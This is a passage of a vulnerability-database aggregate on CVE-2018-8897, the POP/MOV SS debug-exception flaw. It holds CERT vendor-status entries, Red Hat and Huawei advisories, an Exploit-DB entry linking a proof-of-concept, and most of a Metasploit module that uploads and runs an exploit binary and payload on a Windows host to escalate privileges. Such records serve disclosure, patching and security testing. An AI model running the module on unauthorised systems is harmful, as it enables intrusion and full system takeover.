information regarding this vulnerability.\n\n### OpenConnect Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenDNS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation __ Unknown\n\nNotified: May 01, 2018 Updated: May 07, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nOracle Solaris is not affected by `CVE-2018-8897`.\n\n### Peplink Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Philips Electronics Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PowerDNS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QLogic Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QNX Software Systems Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quagga Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quantenna Communications Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ruckus Wireless Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SafeNet Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Samsung Mobile Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Secure64 Software Corporation Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sierra Wireless Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Snort Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Symantec Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TP-LINK Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TrueOS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubiquiti Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Wind River Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Zebra Technologies Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### aep NETWORKS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### dnsmasq Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### eCosCentric Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### m0n0wall Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netsnmp Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### pfSENSE Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 124 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P \nTemporal | 5.3 | E:POC/RL:OF/RC:C \nEnvironmental | 5.3 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://everdox.net/popss.pdf>\n * <http://cwe.mitre.org/data/definitions/703.html>\n\n### Acknowledgements\n\nMicrosoft and Intel credit Nick Peterson of [Everdox Tech, LLC](<https://www.linkedin.com/in/everdox>), for responsibly reporting this vulnerability and working with the group on coordinated disclosure. Andy Lutomirski is also credited for assistance in documenting the vulnerability for Linux.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2018-8897](<http://web.nvd.nist.gov/vuln/detail/CVE-2018-8897>) \n---|--- \n**Date Public:** | 2018-05-08 \n**Date First Published:** | 2018-05-08 \n**Date Last Updated: ** | 2019-07-11 16:31 UTC \n**Document Revision: ** | 107 \n", "modified": "2019-07-11T16:31:00", "published": "2018-05-08T00:00:00", "id": "VU:631579", "href": "https://www.kb.cert.org/vuls/id/631579", "type": "cert", "title": "Hardware debug exception documentation may result in unexpected behavior", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.", "modified": "2018-05-09T02:05:54", "published": "2018-05-09T01:59:19", "id": "RHSA-2018:1353", "href": "https://access.redhat.com/errata/RHSA-2018:1353", "type": "redhat", "title": "(RHSA-2018:1353) Moderate: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:12", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.", "modified": "2018-05-09T02:06:26", "published": "2018-05-09T01:59:05", "id": "RHSA-2018:1352", "href": "https://access.redhat.com/errata/RHSA-2018:1352", "type": "redhat", "title": "(RHSA-2018:1352) Moderate: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.\n\nBug Fix(es):\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554256)", "modified": "2018-05-10T22:10:56", "published": "2018-05-09T01:08:05", "id": "RHSA-2018:1350", "href": "https://access.redhat.com/errata/RHSA-2018:1350", "type": "redhat", "title": "(RHSA-2018:1350) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:08", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1000199", "CVE-2018-8897"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\n* kernel: ptrace() incorrect error handling leads to corruption and DoS (CVE-2018-1000199)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting CVE-2018-8897 and Andy Lutomirski for reporting CVE-2018-1000199.", "modified": "2018-06-07T18:14:49", "published": "2018-05-09T02:00:10", "id": "RHSA-2018:1354", "href": "https://access.redhat.com/errata/RHSA-2018:1354", "type": "redhat", "title": "(RHSA-2018:1354) Important: kernel-rt security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.\n\nBug Fix(es):\n\n* If an NFSv3 client mounted a subdirectory of an exported file system, a directory entry to the mount hosting the export was incorrectly held even after clearing the cache. Consequently, attempts to unmount the subdirectory with the umount command failed with the EBUSY error. With this update, the underlying source code has been fixed, and the unmount operation now succeeds as expected in the described situation. (BZ#1538588)\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554254)", "modified": "2018-05-10T22:11:42", "published": "2018-05-09T01:14:35", "id": "RHSA-2018:1351", "href": "https://access.redhat.com/errata/RHSA-2018:1351", "type": "redhat", "title": "(RHSA-2018:1351) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.\n\nBug Fix(es):\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554251)", "modified": "2018-05-10T22:10:34", "published": "2018-05-09T00:59:57", "id": "RHSA-2018:1349", "href": "https://access.redhat.com/errata/RHSA-2018:1349", "type": "redhat", "title": "(RHSA-2018:1349) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:46", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1087", "CVE-2018-3639", "CVE-2018-8897"], "description": "The ovirt-node-ng packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nNote: This is the redhat-virtualization-host side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-05-25T07:50:45", "published": "2018-05-23T19:45:43", "id": "RHSA-2018:1710", "href": "https://access.redhat.com/errata/RHSA-2018:1710", "type": "redhat", "title": "(RHSA-2018:1710) Important: redhat-virtualization-host security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2017-5754", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754, x86 32-bit)\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Google Project Zero for reporting CVE-2017-5754 and Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting CVE-2018-8897.\n\nBug Fix(es):\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554253)", "modified": "2018-05-10T22:12:54", "published": "2018-05-09T00:17:11", "id": "RHSA-2018:1346", "href": "https://access.redhat.com/errata/RHSA-2018:1346", "type": "redhat", "title": "(RHSA-2018:1346) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1000199", "CVE-2018-1087", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: KVM: error in exception handling leads to wrong debug stack value (CVE-2018-1087)\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\n* kernel: ptrace() incorrect error handling leads to corruption and DoS (CVE-2018-1000199)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2018-1087 and CVE-2018-1000199 and Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting CVE-2018-8897.", "modified": "2018-05-09T02:06:38", "published": "2018-05-08T22:47:46", "id": "RHSA-2018:1345", "href": "https://access.redhat.com/errata/RHSA-2018:1345", "type": "redhat", "title": "(RHSA-2018:1345) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:48", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1087", "CVE-2018-3639", "CVE-2018-8897"], "description": "The rhev-hypervisor7 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: A subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nNote: This is the rhev-hypervisor7 side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-05-25T07:50:45", "published": "2018-05-23T19:46:13", "id": "RHSA-2018:1711", "href": "https://access.redhat.com/errata/RHSA-2018:1711", "type": "redhat", "title": "(RHSA-2018:1711) Important: rhev-hypervisor7 security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2020-09-10T06:41:01", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, some Xen configurations, or FreeBSD, or a Linux kernel. Some of Huawei products also be affected for this vulnerability. An attacker may exploit this vulnerability to escalate their privileges. (Vulnerability ID: HWPSIRT-2018-05100)\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-8897.\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181010-01-debug-en", "edition": 1, "modified": "2020-09-09T00:00:00", "published": "2019-09-21T00:00:00", "id": "HUAWEI-SA-20181010-01-DEBUG", "href": "https://www.huawei.com/en/psirt/security-advisories/2018/huawei-sa-20181010-01-debug-en", "title": "Security Advisory - Privilege Escalation Vulnerability in Some Huawei Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-21T10:34:57", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "Products\n\nSwitches\nRouters\nWLAN\nStorage\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nIntelligent Computing\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nIndustry Cloud Enablement Service\nImprovement Service\nCustomer Support Service\nSee All\n\n\n\nPartner\n\nFind a Partner\nChannel Partner Program\nBecome a Partner\nOpenLab\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\nPre-Sale Resource Center\n\nGo to Full Support", "edition": 1, "modified": "2019-09-21T00:00:00", "published": "2019-09-21T00:00:00", "id": "HUAWEI-SA-20190921-01-DEBUG", "href": "https://www.huawei.com/en/psirt/security-advisories/2019/huawei-sa-20190921-01-debug-en", "title": "Security Advisory - Privilege Escalation Vulnerability in Some Huawei Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows - POPMOV SS Privilege Escalation", "edition": 1, "published": "2018-05-22T00:00:00", "title": "Microsoft Windows - POPMOV SS Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-22T00:00:00", "id": "EXPLOITPACK:F4489E070E6CDADA18DE546A030227F0", "href": "", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.\n\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44697.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-07-14T02:42:05", "description": "", "published": "2018-07-13T00:00:00", "type": "packetstorm", "title": "Microsoft Windows POP/MOV SS Local Privilege Elevation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "PACKETSTORM:148549", "href": "https://packetstormsecurity.com/files/148549/Microsoft-Windows-POP-MOV-SS-Local-Privilege-Elevation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/common' \nrequire 'msf/core/post/file' \nrequire 'msf/core/post/windows/priv' \nrequire 'msf/core/post/windows/registry' \nrequire 'msf/core/exploit/exe' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::Common \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in a statement in the system programming guide \nof the Intel 64 and IA-32 architectures software developer's manual being mishandled \nin various operating system kerneles, resulting in unexpected behavior for #DB \nexcpetions that are deferred by MOV SS or POP SS. \n \nThis module will upload the pre-compiled exploit and use it to execute the final \npayload in order to gain remote code execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nick Peterson', # Original discovery (@nickeverdox) \n'Nemanja Mulasmajic', # Original discovery (@0xNemi) \n'Can BAPlA1/4k <can1357>', # PoC \n'bwatters-r7' # msf module \n], \n'Platform' => [ 'win' ], \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ 'Windows x64', { 'Arch' => ARCH_X64 } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 08 2018', \n'References' => \n[ \n['CVE', '2018-8897'], \n['EDB', '44697'], \n['BID', '104071'], \n['URL', 'https://github.com/can1357/CVE-2018-8897/'], \n['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/'] \n], \n'DefaultOptions' => \n{ \n'DisablePayloadHandler' => 'False' \n} \n)) \n \nregister_options([ \nOptString.new('EXPLOIT_NAME', \n[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), \nOptString.new('PAYLOAD_NAME', \n[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), \nOptString.new('PATH', \n[false, 'Path to write binaries (%TEMP% by default).', nil]), \nOptInt.new('EXECUTE_DELAY', \n[false, 'The number of seconds to delay before executing the exploit', 3]) \n]) \nend \n \ndef setup \nsuper \n@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) \n@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) \n@exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i) \n@payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i) \n@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') \n@payload_path = \"#{temp_path}\\\\#{payload_name}\" \n@exploit_path = \"#{temp_path}\\\\#{exploit_name}\" \n@payload_exe = generate_payload_exe \nend \n \ndef validate_active_host \nbegin \nhost = session.session_host \nprint_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nraise Msf::Exploit::Failed, 'Could not connect to session' \nend \nend \n \ndef validate_remote_path(path) \nunless directory?(path) \nfail_with(Failure::Unreachable, \"#{path} does not exist on the target\") \nend \nend \n \ndef validate_target \nif sysinfo['Architecture'] == ARCH_X86 \nfail_with(Failure::NoTarget, 'Exploit code is 64-bit only') \nend \nif sysinfo['OS'] =~ /XP/ \nfail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') \nend \nend \n \ndef ensure_clean_destination(path) \nif file?(path) \nprint_status(\"#{path} already exists on the target. Deleting...\") \nbegin \nfile_rm(path) \nprint_status(\"Deleted #{path}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(\"Unable to delete #{path}\") \nend \nend \nend \n \ndef ensure_clean_exploit_destination \nensure_clean_destination(exploit_path) \nend \n \ndef ensure_clean_payload_destination \nensure_clean_destination(payload_path) \nend \n \ndef upload_exploit \nlocal_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe') \nupload_file(exploit_path, local_exploit_path) \nprint_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\") \nend \n \ndef upload_payload \nwrite_file(payload_path, payload_exe) \nprint_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\") \nend \n \ndef execute_exploit \nsleep(datastore['EXECUTE_DELAY']) \nprint_status(\"Running exploit #{exploit_path} with payload #{payload_path}\") \noutput = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\") \nvprint_status(output) \nend \n \ndef exploit \nbegin \nvalidate_active_host \nvalidate_target \nvalidate_remote_path(temp_path) \nensure_clean_exploit_destination \nensure_clean_payload_destination \nupload_exploit \nupload_payload \nexecute_exploit \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(e.message) \nensure_clean_exploit_destination \nensure_clean_payload_destination \nend \nend \n \nattr_reader :exploit_name \nattr_reader :payload_name \nattr_reader :payload_exe \nattr_reader :temp_path \nattr_reader :payload_path 